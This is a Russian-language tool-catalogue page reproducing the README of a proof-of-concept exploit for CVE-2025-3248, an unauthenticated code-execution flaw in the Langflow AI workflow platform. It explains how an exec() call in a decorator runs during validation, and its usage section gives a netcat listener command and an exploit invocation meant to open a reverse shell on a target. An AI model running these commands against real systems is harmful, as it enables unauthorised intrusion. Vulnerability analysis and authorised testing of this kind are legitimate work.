Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-3248-Langflow-RCE — Доказательство концепции эксплуатации CVE-2025-3248 — уязвимости удалённого выполнения кода без аутентификации в Langflow, демонстрирующей внедрение кода через конечную точку /api/v1/validate/code. | Kitploit
Инструменты/GitHubGitHub/hideki233/cve-2025-3248-langflow-rce
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubhideki233/cve-2025-3248-langflow-rce

CVE-2025-3248-Langflow-RCE

Доказательство концепции эксплуатации CVE-2025-3248 — уязвимости удалённого выполнения кода без аутентификации в Langflow, демонстрирующей внедрение кода через конечную точку /api/v1/validate/code.

Репозиторий
16 ч 30 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-3248 — Langflow: неаутентифицированное удалённое выполнение кода

Proof-of-Concept эксплойт для CVE-2025-3248 — уязвимости неаутентифицированного удалённого выполнения кода в Langflow, платформе для создания рабочих процессов на базе ИИ/LLM.

  • Затронутые версии: Langflow < 1.3.0
  • Исправлено в: 1.3.0
  • Класс уязвимости: Неаутентифицированное RCE (CWE-94, внедрение кода)
  • Статус: Добавлена в каталог известных эксплуатируемых уязвимостей CISA после того, как было замечено её использование ботнетами в реальных атаках.

Первопричина

Langflow предоставляет конечную точку POST /api/v1/validate/code, предназначенную для «проверки» фрагмента Python-кода, отправляемого из пользовательского интерфейса (например, кода пользовательских компонентов). Внутри она разбирает и компилирует код с помощью ast.parse() / compile() и сообщает, является ли он корректным — при этом аутентификация не требуется.

Суть ошибки: Python вычисляет выражения декораторов на этапе разбора/компиляции, до того как декорированная функция будет вызвана. Если отправленный «код для проверки» содержит декоратор вида:

root@kitploit:~
@exec("...вредоносный код...")
def test():
    pass

то вызов exec(...) выполняется в момент разбора кода — для проверки фактически не требуется вызывать test(). В сочетании с отсутствием аутентификации и песочницы одного неаутентифицированного HTTP-запроса достаточно для выполнения произвольных команд на хосте, где запущен Langflow.

Использование

  1. Запустите прослушиватель на вашей машине:
    root@kitploit:~
    nc -lvnp 9001
    
  2. Запустите PoC против цели:
    root@kitploit:~
    python3 exploit.py --target http://TARGET_IP:7860 --lhost YOUR_IP --lport 9001
    
  3. Если цель уязвима, вы получите shell на прослушивателе.
root@kitploit:~
usage: exploit.py [-h] --target TARGET --lhost LHOST [--lport LPORT] [--timeout TIMEOUT]

Требования

root@kitploit:~
pip install requests

Отказ от ответственности

Этот код предоставлен исключительно в образовательных целях и для авторизованного тестирования безопасности (лаборатории, CTF, работы с явным письменным разрешением). Не запускайте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Автор не несёт ответственности за неправомерное использование.

Ссылки

  • Langflow Security Advisory GHSA-vwmf-pq79-vjvx
  • Horizon3.ai — Unsafe at Any Speed: Abusing Python Exec for Unauth RCE in Langflow AI
  • Keysight — CVE-2025-3248: Langflow Unauthenticated Code Validation
Скачать инструмент